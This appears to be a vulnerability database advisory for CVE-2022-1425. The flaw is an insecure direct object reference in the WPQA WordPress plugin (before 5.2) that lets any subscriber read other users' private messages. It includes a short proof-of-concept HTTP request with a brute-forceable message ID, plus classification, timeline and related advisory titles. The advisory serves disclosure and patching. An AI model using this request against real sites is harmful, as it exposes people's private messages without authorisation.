WPQA < 5.2 – Subscriber+ Private Message Disclosure via IDOR | CVE 2022-1425 | Plugin Vulnerabilities

Description

The plugin, used as a companion plugin for the Discy and Himer themes, does not validate that the message_id of the wpqa_message_view ajax action belongs to the requesting user, leading to any user being able to read messages for any other users via a Insecure Direct Object Reference (IDOR) vulnerability.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Cookie: <valid cookie of any user>

action=wpqa_message_view&message_id=<numeric_id_can_be_bruteforced>

Affects Plugins

Fixed in 5.2

References

CVE

YouTube Video

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website

https://veshrajghimire.com.np

Submitter twitter

Verified

Yes

WPVDB ID

b110e2f7-4aa3-47b5-a8f2-0a7fe53cc467

Timeline

Publicly Published

2022-04-21 (about 3 years ago)

Added

2022-04-21 (about 3 years ago)

Last Updated

2022-05-07 (about 3 years ago)

Other

Published

Title

Published

2024-03-26

Title

Event Tickets and Registration < 5.8.3 - Improper Authorization to Information Disclosure

Published

2024-09-06

Title

ForumWP – Forum & Discussion Board Plugin < 2.1.0 - Insecure Direct Object Reference to Authenticated (Subscriber+) Privilege Escalation via Account Takeover

Published

2024-09-04

Title

Jetpack < 13.8 - Unauthenticated Arbitrary Block & Shortcode Execution

Published

2025-02-13

Title

Return Refund and Exchange For WooCommerce < 4.4.6 - Subscriber+ IDOR

Published

2025-09-01

Title

Miraculous Core < 2.0.9 - Unauthenticated Insecure Direct Object Reference